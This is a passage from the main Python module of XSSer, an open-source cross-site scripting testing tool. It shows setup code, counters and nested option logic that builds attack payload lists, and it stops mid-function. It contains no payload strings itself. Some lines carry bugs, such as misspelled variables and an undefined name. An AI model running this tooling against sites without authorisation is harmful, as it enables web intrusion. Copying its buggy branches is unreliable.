Home Explore Help
Sign In
epsylon
/
xsser
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0
Tree: 28334db377
Branches Tags
xsser
/
core
/
main.py

main.py 185 KB
History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219322032213222322332243225322632273228322932303231323232333234323532363237323832393240324132423243324432453246324732483249325032513252325332543255325632573258325932603261326232633264326532663267326832693270327132723273327432753276327732783279328032813282328332843285328632873288328932903291329232933294329532963297329832993300330133023303330433053306330733083309331033113312331333143315331633173318331933203321332233233324332533263327332833293330333133323333333433353336333733383339334033413342334333443345334633473348334933503351335233533354335533563357335833593360336133623363336433653366336733683369337033713372337333743375337633773378337933803381338233833384338533863387338833893390339133923393339433953396339733983399340034013402340334043405340634073408340934103411341234133414341534163417341834193420342134223423342434253426342734283429343034313432343334343435343634373438343934403441344234433444344534463447344834493450345134523453345434553456345734583459346034613462346334643465346634673468346934703471347234733474347534763477347834793480348134823483348434853486348734883489349034913492349334943495349634973498349935003501350235033504350535063507350835093510351135123513351435153516351735183519352035213522352335243525352635273528 
  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. # vim: set expandtab tabstop=4 shiftwidth=4:
    4. 

  4. """
    5. 

  5. This file is part of the XSSer project, https://xsser.03c8.net
    6. 

  6. 

  7. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
    8. 

  8. 

  9. xsser is free software; you can redistribute it and/or modify it under
    10. 

  10. the terms of the GNU General Public License as published by the Free
    11. 

  11. Software Foundation version 3 of the License.
    12. 

  12. 

  13. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
    14. 

  14. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    15. 

  15. FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
    16. 

  16. details.
    17. 

  17. 

  18. You should have received a copy of the GNU General Public License along
    19. 

  19. with xsser; if not, write to the Free Software Foundation, Inc., 51
    20. 

  20. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    21. 

  21. """
    22. 

  22. import os, re, sys, datetime, hashlib, time, urllib.request, urllib.parse, urllib.error, cgi, traceback, webbrowser, random
    23. 

  23. from random import randint
    24. 

  24. from base64 import b64encode, b64decode
    25. 

  25. import core.fuzzing
    26. 

  26. import core.fuzzing.vectors
    27. 

  27. import core.fuzzing.DCP
    28. 

  28. import core.fuzzing.DOM
    29. 

  29. import core.fuzzing.HTTPsr
    30. 

  30. import core.fuzzing.heuristic
    31. 

  31. from collections import defaultdict
    32. 

  32. from itertools import islice, chain
    33. 

  33. from urllib.parse import parse_qs, urlparse
    34. 

  34. from core.curlcontrol import Curl
    35. 

  35. from core.encdec import EncoderDecoder
    36. 

  36. from core.options import XSSerOptions
    37. 

  37. from core.dork import Dorker
    38. 

  38. from core.crawler import Crawler
    39. 

  39. from core.imagexss import ImageInjections
    40. 

  40. from core.flashxss import FlashInjections
    41. 

  41. from core.post.xml_exporter import xml_reporting
    42. 

  42. from core.tokenhub import HubThread
    43. 

  43. from core.reporter import XSSerReporter
    44. 

  44. from core.threadpool import ThreadPool, NoResultsPending
    45. 

  45. from core.update import Updater
    46. 

  46. 

  47. # set to emit debug messages about errors (0 = off).
    48. 

  48. DEBUG = 0
    49. 

  49. 

  50. class xsser(EncoderDecoder, XSSerReporter):
    51. 

  51.     """
    52. 

  52.     XSSer application class
    53. 

  53.     """
    54. 

  54.     def __init__(self, mothership=None):
    55. 

  55.         self._reporter = None
    56. 

  56.         self._reporters = []
    57. 

  57.         self._landing = False
    58. 

  58.         self._ongoing_requests = 0
    59. 

  59.         self._oldcurl = []
    60. 

  60.         self._gtkdir = None
    61. 

  61.         self._webbrowser = webbrowser
    62. 

  62.         self.crawled_urls = []
    63. 

  63.         self.checked_urls = []
    64. 

  64.         self.successful_urls = []
    65. 

  65.         self.urlmalformed = False
    66. 

  66.         self.search_engines = [] # available dorking search engines
    67. 

  67.         self.search_engines.append('bing') # [26/08/2019: OK!]
    68. 

  68.         self.search_engines.append('yahoo') # [26/08/2019: OK!]
    69. 

  69.         self.search_engines.append('startpage') # [26/08/2019: OK!]
    70. 

  70.         self.search_engines.append('duck') # [26/08/2019: OK!]
    71. 

  71.         #self.search_engines.append('google')
    72. 

  72.         #self.search_engines.append('yandex')
    73. 

  73.         self.user_template = None # wizard user template
    74. 

  74.         self.user_template_conntype = "GET" # GET by default
    75. 

  75.         self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
    76. 

  76. 

  77.         if not mothership:
    78. 

  78.             # no mothership so *this* is the mothership
    79. 

  79.             # start the communications hub and rock on!
    80. 

  80.             self.hub = None
    81. 

  81.             self.pool = ThreadPool(0)
    82. 

  82.             self.mothership = None
    83. 

  83.             self.final_attacks = {}
    84. 

  84.         else:
    85. 

  85.             self.hub = None
    86. 

  86.             self.mothership = mothership
    87. 

  87.             self.mothership.add_reporter(self)
    88. 

  88.             self.pool = ThreadPool(0)
    89. 

  89.             self.final_attacks = self.mothership.final_attacks
    90. 

  90. 

  91.         # initialize the url encoder/decoder
    92. 

  92.         EncoderDecoder.__init__(self)
    93. 

  93. 

  94.         # your unique real opponent
    95. 

  95.         self.time = datetime.datetime.now()
    96. 

  96. 

  97.         # this payload comes with vector already..
    98. 

  98.         self.DEFAULT_XSS_PAYLOAD = 'XSS'
    99. 

  99. 

  100.         # to be or not to be...
    101. 

  101.         self.hash_found = []
    102. 

  102.         self.hash_notfound = []
    103. 

  103. 

  104.         # other hashes
    105. 

  105.         self.hashed_injections={}
    106. 

  106.         self.extra_hashed_injections={}
    107. 

  107.         self.extra_hashed_vector_url = {}
    108. 

  108.         self.final_hashes = {} # final hashes used by each method
    109. 

  109. 

  110.         # some counters for checker systems
    111. 

  111.         self.errors_isalive = 0
    112. 

  112.         self.next_isalive = False
    113. 

  113.         self.flag_isalive_num = 0
    114. 

  114.         self.rounds = 0
    115. 

  115.         self.round_complete = 0
    116. 

  116.         
    117. 

  117.         # some controls about targets
    118. 

  118.         self.urlspoll = []
    119. 

  119. 

  120.         # some statistics counters for connections
    121. 

  121.         self.success_connection = 0
    122. 

  122.         self.not_connection = 0
    123. 

  123.         self.forwarded_connection = 0
    124. 

  124.         self.other_connection = 0
    125. 

  125. 

  126. 	    # some statistics counters for payloads
    127. 

  127.         self.xsr_injection = 0
    128. 

  128.         self.xsa_injection = 0
    129. 

  129.         self.coo_injection = 0
    130. 

  130.         self.manual_injection = 0
    131. 

  131.         self.auto_injection = 0
    132. 

  132.         self.dcp_injection = 0
    133. 

  133.         self.dom_injection = 0
    134. 

  134.         self.httpsr_injection = 0
    135. 

  135.         self.check_positives = 0
    136. 

  136.         
    137. 

  137.         # some statistics counters for injections found
    138. 

  138.         self.xsr_found = 0
    139. 

  139.         self.xsa_found = 0
    140. 

  140.         self.coo_found = 0
    141. 

  141.         self.manual_found = 0
    142. 

  142.         self.auto_found = 0
    143. 

  143.         self.dcp_found = 0
    144. 

  144.         self.dom_found = 0
    145. 

  145.         self.httpsr_found = 0
    146. 

  146.         self.false_positives = 0
    147. 

  147. 

  148. 	    # some statistics counters for heuristic parameters
    149. 

  149.         self.heuris_hashes = []
    150. 

  150.         self.heuris_backslash_found = 0
    151. 

  151.         self.heuris_une_backslash_found = 0
    152. 

  152.         self.heuris_dec_backslash_found = 0
    153. 

  153.         self.heuris_backslash_notfound = 0
    154. 

  154.         self.heuris_slash_found = 0
    155. 

  155.         self.heuris_une_slash_found = 0
    156. 

  156.         self.heuris_dec_slash_found = 0
    157. 

  157.         self.heuris_slash_notfound = 0
    158. 

  158.         self.heuris_mayor_found = 0
    159. 

  159.         self.heuris_une_mayor_found = 0
    160. 

  160.         self.heuris_dec_mayor_found = 0
    161. 

  161.         self.heuris_mayor_notfound = 0
    162. 

  162.         self.heuris_minor_found = 0
    163. 

  163.         self.heuris_une_minor_found = 0
    164. 

  164.         self.heuris_dec_minor_found = 0
    165. 

  165.         self.heuris_minor_notfound = 0
    166. 

  166.         self.heuris_semicolon_found = 0
    167. 

  167.         self.heuris_une_semicolon_found = 0
    168. 

  168.         self.heuris_dec_semicolon_found = 0
    169. 

  169.         self.heuris_semicolon_notfound = 0
    170. 

  170.         self.heuris_colon_found = 0
    171. 

  171.         self.heuris_une_colon_found = 0
    172. 

  172.         self.heuris_dec_colon_found = 0
    173. 

  173.         self.heuris_colon_notfound = 0
    174. 

  174.         self.heuris_doublecolon_found = 0
    175. 

  175.         self.heuris_une_doublecolon_found = 0
    176. 

  176.         self.heuris_dec_doublecolon_found = 0
    177. 

  177.         self.heuris_doublecolon_notfound = 0
    178. 

  178.         self.heuris_equal_found = 0
    179. 

  179.         self.heuris_une_equal_found = 0
    180. 

  180.         self.heuris_dec_equal_found = 0
    181. 

  181.         self.heuris_equal_notfound = 0
    182. 

  182. 

  183.         # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
    184. 

  184.         self.verbose = 2
    185. 

  185.         self.options = None
    186. 

  186. 

  187.     def __del__(self):
    188. 

  188.         if not self._landing:
    189. 

  189.             self.land()
    190. 

  190. 

  191.     def get_gtk_directory(self):
    192. 

  192.         if self._gtkdir:
    193. 

  193.             return self._gtkdir
    194. 

  194.         local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
    195. 

  195.                                   'gtk')
    196. 

  196.         if os.path.exists(local_path):
    197. 

  197.             self._gtkdir = local_path
    198. 

  198.             return self._gtkdir
    199. 

  199.         elif os.path.exists('/usr/share/xsser/gtk'):
    200. 

  200.             self._gtkdir = '/usr/share/xsser/gtk'
    201. 

  201.             return self._gtkdir
    202. 

  202. 

  203.     def set_webbrowser(self, browser):
    204. 

  204.         self._webbrowser = browser
    205. 

  205. 

  206.     def set_reporter(self, reporter):
    207. 

  207.         self._reporter = reporter
    208. 

  208. 

  209.     def add_reporter(self, reporter):
    210. 

  210.         self._reporters.append(reporter)
    211. 

  211. 

  212.     def remove_reporter(self, reporter):
    213. 

  213.         if reporter in self._reporters:
    214. 

  214.             self._reporters.remove(reporter)
    215. 

  215. 

  216.     def generate_hash(self, attack_type='default'):
    217. 

  217.         """
    218. 

  218.         Generate a new hash for a type of attack.
    219. 

  219.         """
    220. 

  220.         date = str(datetime.datetime.now())
    221. 

  221.         encoded_hash = date + attack_type
    222. 

  222.         return hashlib.md5(encoded_hash.encode('utf-8')).hexdigest()
    223. 

  223. 

  224.     def generate_numeric_hash(self): # 32 length as md5
    225. 

  225.         """
    226. 

  226.         Generate a new hash for numeric only XSS
    227. 

  227.         """
    228. 

  228.         newhash = ''.join(random.choice('0123456789') for i in range(32)) 
    229. 

  229.         return newhash
    230. 

  230. 

  231.     def report(self, msg, level='info'):
    232. 

  232.         """
    233. 

  233.         Report some error from the application.
    234. 

  234. 

  235.         levels: debug, info, warning, error
    236. 

  236.         """
    237. 

  237.         if self.verbose == 2:
    238. 

  238.             prefix = ""
    239. 

  239.             if level != 'info':
    240. 

  240.                 prefix = "["+level+"] "
    241. 

  241.             print(msg)
    242. 

  242.         elif self.verbose:
    243. 

  243.             if level == 'error':
    244. 

  244.                 sys.stdout.write("*")
    245. 

  245.             else:
    246. 

  246.                 sys.stdout.write(".")
    247. 

  247.         for reporter in self._reporters:
    248. 

  248.             reporter.post(msg)
    249. 

  249.         if self._reporter:
    250. 

  250.             from twisted.internet import reactor
    251. 

  251.             reactor.callFromThread(self._reporter.post, msg)
    252. 

  252. 

  253.     def set_options(self, options):
    254. 

  254.         """
    255. 

  255.         Set xsser options
    256. 

  256.         """
    257. 

  257.         self.options = options
    258. 

  258.         self._opt_request()
    259. 

  259. 

  260.     def _opt_request(self):
    261. 

  261.         """
    262. 

  262.         Pass on some properties to Curl
    263. 

  263.         """
    264. 

  264.         options = self.options
    265. 

  265.         for opt in ['cookie', 'agent', 'referer',\
    266. 

  266. 			'headers', 'atype', 'acred', 'acert',
    267. 

  267. 			'proxy', 'ignoreproxy', 'timeout', 
    268. 

  268.             'delay', 'tcp_nodelay', 'retries', 
    269. 

  269.             'xforw', 'xclient', 'threads', 
    270. 

  270.             'dropcookie', 'followred', 'fli',
    271. 

  271.             'nohead', 'isalive', 'alt', 'altm',
    272. 

  272.             'ald'
    273. 

  273. 			]:
    274. 

  274.             if hasattr(options, opt) and getattr(options, opt):
    275. 

  275.                 setattr(Curl, opt, getattr(options, opt))
    276. 

  276. 

  277.     def get_payloads(self):
    278. 

  278.         """
    279. 

  279.         Process payload options and make up the payload list for the attack.
    280. 

  280.         """
    281. 

  281.         options = self.options
    282. 

  282.     	# payloading sources for --auto
    283. 

  283.         payloads_fuzz = core.fuzzing.vectors.vectors
    284. 

  284.         if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
    285. 

  285.             self.options.fuzz = True
    286. 

  286.         # set a type for XSS auto-fuzzing vectors
    287. 

  287.         if options.fzz_info:
    288. 

  288.             fzz_payloads = []
    289. 

  289.             for fuzz in payloads_fuzz:
    290. 

  290.                 if not fuzz["browser"] == "[Not Info]":
    291. 

  291.                     fzz_payloads.append(fuzz)
    292. 

  292.             payloads_fuzz = fzz_payloads
    293. 

  293.         # set a limit for XSS auto-fuzzing vectors
    294. 

  294.         if options.fzz_num:
    295. 

  295.             try:
    296. 

  296.                 options.fzz_num = int(options.fzz_num)
    297. 

  297.             except:
    298. 

  298.                 options.fzz_num = len(payloads_fuzz)
    299. 

  299.             fzz_num_payloads = []
    300. 

  300.             fzz_vector = 0
    301. 

  301.             for fuzz in payloads_fuzz:
    302. 

  302.                 fzz_vector = fzz_vector + 1
    303. 

  303.                 if int(fzz_vector) < int(options.fzz_num)+1:
    304. 

  304.                     fzz_num_payloads.append(fuzz)
    305. 

  305.             payloads_fuzz = fzz_num_payloads
    306. 

  306.         # set random order for XSS auto-fuzzing vectors
    307. 

  307.         if options.fzz_rand:
    308. 

  308.             try:
    309. 

  309.                 from random import shuffle
    310. 

  310.                 shuffle(payloads_fuzz) # shuffle paylods
    311. 

  311.             except:
    312. 

  312.                 pass
    313. 

  313.         payloads_dcp = core.fuzzing.DCP.DCPvectors
    314. 

  314.         payloads_dom = core.fuzzing.DOM.DOMvectors
    315. 

  315.         payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
    316. 

  316.         manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
    317. 

  317.         # sustitute payload for hash to check for false positives
    318. 

  318.         self.hashed_payload = "XSS"
    319. 

  319.         checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
    320. 

  320.         # heuristic parameters
    321. 

  321.         heuristic_params = core.fuzzing.heuristic.heuristic_test
    322. 

  322.         def enable_options_heuristic(payloads):
    323. 

  323.             if options.heuristic:
    324. 

  324.                 payloads = heuristic_params + payloads
    325. 

  325.                 if options.dom:
    326. 

  326.                     payloads = payloads + payloads_dom
    327. 

  327.             return payloads
    328. 

  328.         if options.fuzz:
    329. 

  329.             payloads = payloads_fuzz
    330. 

  330.             if options.dcp:
    331. 

  331.                 payloads = payloads + payloads_dcp
    332. 

  332.                 if options.script:
    333. 

  333.                     payloads = payloads + manual_payload
    334. 

  334.                     if options.hash:
    335. 

  335.                         payloads = checker_payload + payloads
    336. 

  336.                         if options.inducedcode:
    337. 

  337.                             payloads = payloads + payloads_httpsr
    338. 

  338.                             if options.heuristic:
    339. 

  339.                                 payloads = heuristic_params + payloads
    340. 

  340.                                 if options.dom:
    341. 

  341.                                     payloads = payloads + payloads_dom
    342. 

  342.                     elif options.inducedcode:
    343. 

  343.                         payloads = payloads + payloads_httpsr
    344. 

  344.                         if options.heuristic:
    345. 

  345.                             payloads = heuristic_params + payloads
    346. 

  346.                             if options.dom:
    347. 

  347.                                 payloads = payloads + payloads_dom
    348. 

  348.                         elif options.dom:
    349. 

  349.                             payloads = payloads + payloads_dom
    350. 

  350.                     elif options.heuristic:
    351. 

  351.                         payloads = heuristic_params + payloads
    352. 

  352.                         if options.dom:
    353. 

  353.                             payloads = payloads + payloads_dom
    354. 

  354.                     elif options.dom:
    355. 

  355.                         payloads = payloads + payloads_dom
    356. 

  356.                 elif options.hash:
    357. 

  357.                     payloads = checker_payload + payloads
    358. 

  358.                     if options.inducedcode:
    359. 

  359.                         payloads = payloads + payloads_httpsr
    360. 

  360.                         if options.heuristic:
    361. 

  361.                             payloads = heuristic_params + payloads
    362. 

  362.                             if options.dom:
    363. 

  363.                                 payloads = payloads + payloads_dom
    364. 

  364.                         elif options.dom:
    365. 

  365.                             payloads = payloads + payloads_dom
    366. 

  366.                 elif options.inducedcode:
    367. 

  367.                     payloads = payloads + payloads_httpsr
    368. 

  368.                     if options.heuristic:
    369. 

  369.                         payloads = heuristic_params + payloads
    370. 

  370.                         if options.dom:
    371. 

  371.                             payloads = payloads + payloads_dom
    372. 

  372.                     elif options.dom:
    373. 

  373.                         payloads = payloads + payloads_dom
    374. 

  374.             elif options.script:
    375. 

  375.                 payloads = payloads + manual_payload
    376. 

  376.                 if options.hash:
    377. 

  377.                     payloads = checker_payload + payloads
    378. 

  378.                     if options.inducedcode:
    379. 

  379.                         payloads = payaloads + payloads_httpsr
    380. 

  380.                         if options.heuristic:
    381. 

  381.                             payloads = heuristic_params + payloads
    382. 

  382.                             if options.dom:
    383. 

  383.                                 payloads = payloads + payloads_dom
    384. 

  384.             elif options.hash:
    385. 

  385.                 payloads = checker_payload + payloads
    386. 

  386.                 if options.inducedcode:
    387. 

  387.                     payloads = payloads + payloads_httpsr
    388. 

  388.                     if options.heuristic:
    389. 

  389.                         payloads = heuristic_params + payloads
    390. 

  390.                         if options.dom:
    391. 

  391.                             payloads = payloads + payloads_dom
    392. 

  392.                     elif options.dom:
    393. 

  393.                         payloads = payloads + payloads_dom
    394. 

  394.                 elif options.heuristic:
    395. 

  395.                     payloads = heuristic_params + payloads
    396. 

  396.                     if options.dom:
    397. 

  397.                         payloads = payloads + payloads_dom
    398. 

  398.                 elif options.dom:
    399. 

  399.                     payloads = payloads + payloads_dom
    400. 

  400.             elif options.inducedcode:
    401. 

  401.                 payloads = payloads + payloads_httpsr
    402. 

  402.                 if options.hash:
    403. 

  403.                     payloads = checker_payload + payloads
    404. 

  404.                     if options.heuristic:
    405. 

  405.                         payloads = heuristic_params + payloads
    406. 

  406.                         if options.dom:
    407. 

  407.                             payloads = payloads + payloads_dom
    408. 

  408.                     elif options.dom:
    409. 

  409.                         payloads = payloads + payloads_dom
    410. 

  410.             elif options.heuristic:
    411. 

  411.                 payloads = heuristic_params + payloads
    412. 

  412.                 if options.dom:
    413. 

  413.                     payloads = payloads + payloads_dom
    414. 

  414.             elif options.dom:
    415. 

  415.                 payloads = payloads + payloads_dom
    416. 

  416.         elif options.dcp:
    417. 

  417.             payloads = payloads_dcp
    418. 

  418.             if options.script:
    419. 

  419.                 payloads = payloads + manual_payload
    420. 

  420.                 if options.hash:
    421. 

  421.                     payloads = checker_payload + payloads
    422. 

  422.                     if options.inducedcode:
    423. 

  423.                         payloads = payloads + payloads_httpsr
    424. 

  424.                         if options.heuristic:
    425. 

  425.                             payloads = heuristic_params + payloads
    426. 

  426.                             if options.dom:
    427. 

  427.                                 payloads = payloads + payloads_dom
    428. 

  428.             elif options.hash:
    429. 

  429.                 payloads = checker_payload + payloads
    430. 

  430.                 if options.inducedcode:
    431. 

  431.                     payloads = payloads + inducedcode
    432. 

  432.                     if options.heuristic:
    433. 

  433.                         payloads = heuristic_params + payloads
    434. 

  434.                         if options.dom:
    435. 

  435.                             payloads = payloads + payloads_dom
    436. 

  436.                     elif options.dom:
    437. 

  437.                         payloads = payloads + payloads_dom
    438. 

  438.             elif options.inducedcode:
    439. 

  439.                 payloads = payloads + payloads_httpsr
    440. 

  440.                 if options.heuristic:
    441. 

  441.                     payloads = heuristic_params + payloads
    442. 

  442.                     if options.dom:
    443. 

  443.                         payloads = payloads + payloads_dom
    444. 

  444.                 elif options.dom:
    445. 

  445.                     payloads = payloads + payloads_dom
    446. 

  446.             elif options.heuristic:
    447. 

  447.                 payloads = heuristic_params + payloads
    448. 

  448.                 if options.dom:
    449. 

  449.                     payloads = payloads + payloads_dom
    450. 

  450.             elif options.dom:
    451. 

  451.                 payloads = payloads + payloads_dom
    452. 

  452.         elif options.script:
    453. 

  453.             payloads = manual_payload
    454. 

  454.             if options.hash:
    455. 

  455.                 payloads = checker_payload + payloads
    456. 

  456.                 if options.inducedcode:
    457. 

  457.                     payloads = payloads + payloads_httpsr
    458. 

  458.                     if options.heuristic:
    459. 

  459.                         payloads = heuristic_params + payloads
    460. 

  460.                         if options.dom:
    461. 

  461.                             payloads = payloads + payloads_dom
    462. 

  462.             elif options.inducedcode:
    463. 

  463.                 payloads = payloads + payloads_httpsr
    464. 

  464.                 if options.heuristic:
    465. 

  465.                     payloads = heuristic_params + payloads
    466. 

  466.                     if options.dom:
    467. 

  467.                         payloads = payloads + payloads_dom
    468. 

  468.                 elif options.dom:
    469. 

  469.                     payloads = payloads + payloads_dom
    470. 

  470.             elif options.heuristic:
    471. 

  471.                 payloads = heuristic_params + payloads
    472. 

  472.                 if options.dom:
    473. 

  473.                     paylaods = payloads + payloads_dom
    474. 

  474.             elif options.dom:
    475. 

  475.                 payloads = payloads + payloads_dom
    476. 

  476.         elif options.inducedcode:
    477. 

  477.             payloads = payloads_httpsr
    478. 

  478.             if options.hash:
    479. 

  479.                 payloads = checker_payload + payloads
    480. 

  480.                 if options.heuristic:
    481. 

  481.                     payloads = heuristic_params + payloads
    482. 

  482.                     if options.dom:
    483. 

  483.                         payloads = payloads + payloads_dom
    484. 

  484.             elif options.heuristic:
    485. 

  485.                 payloads = heuristic_params + payloads
    486. 

  486.                 if options.dom:
    487. 

  487.                     payloads = payloads + payloads_dom
    488. 

  488.             elif options.dom:
    489. 

  489.                 payloads = payloads + payloads_dom
    490. 

  490.         elif options.heuristic:
    491. 

  491.             payloads = heuristic_params
    492. 

  492.             if options.hash:
    493. 

  493.                 payloads = checker_payload + payloads
    494. 

  494.                 if options.dom:
    495. 

  495.                     payloads = payloads + payloads_dom
